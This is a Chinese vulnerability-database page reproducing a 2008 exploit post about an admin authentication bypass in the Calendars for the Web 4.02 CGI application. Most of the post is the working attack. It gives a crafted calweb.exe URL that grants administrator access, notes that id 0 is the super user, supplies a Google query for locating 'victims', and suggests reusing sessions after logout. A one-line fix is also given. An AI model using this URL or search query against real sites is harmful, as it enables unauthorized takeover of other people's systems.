Calendars for the Web 4.02 - Admin Authentication Bypass

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056912 漏洞类型
发布时间 2008-10-16 更新时间 2008-10-16
CVE编号 N/A CNNVD-ID N/A
漏洞平台 CGI CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/6771
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
*******************************************************
*Exploit discovered by SecVuln from http://secvuln.com*
*Come join our clan!                                  *
*contact secvuln@secvuln.com                          *
*******************************************************

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Author == SecVuln
Version == 4.02
Software == Calendars for the web by great hill corporation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Calendars for the web has a vulnerability in the administration page.
The page saves the past session, so that anyone navigating to the page has
admin access.

Exploit:

Before attack: target.com/calendarWeb/cgi-bin/calweb/calweb.exe

After attack:
target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0

Example:
target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
how to fix: set time out for login to five minutes    !
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

A Google query can find a couple pages of victims:  inurl:calweb/calweb.exe

Further hacks: if they disable the timeout you can still log in right after
they log out... You could probaly do something with that
Also the 0 at the ending is the administrator (super user) id.

/////////////////////////////////////////////////////////////////
I take no responsability for the misuse of the information.//////
Author will not be held liable for any damages             //////
COME CHECK MY SITE OUT WWW.SECVULN.COM                     //////
////////////////////////////////////////////////////////////////

# milw0rm.com [2008-10-16]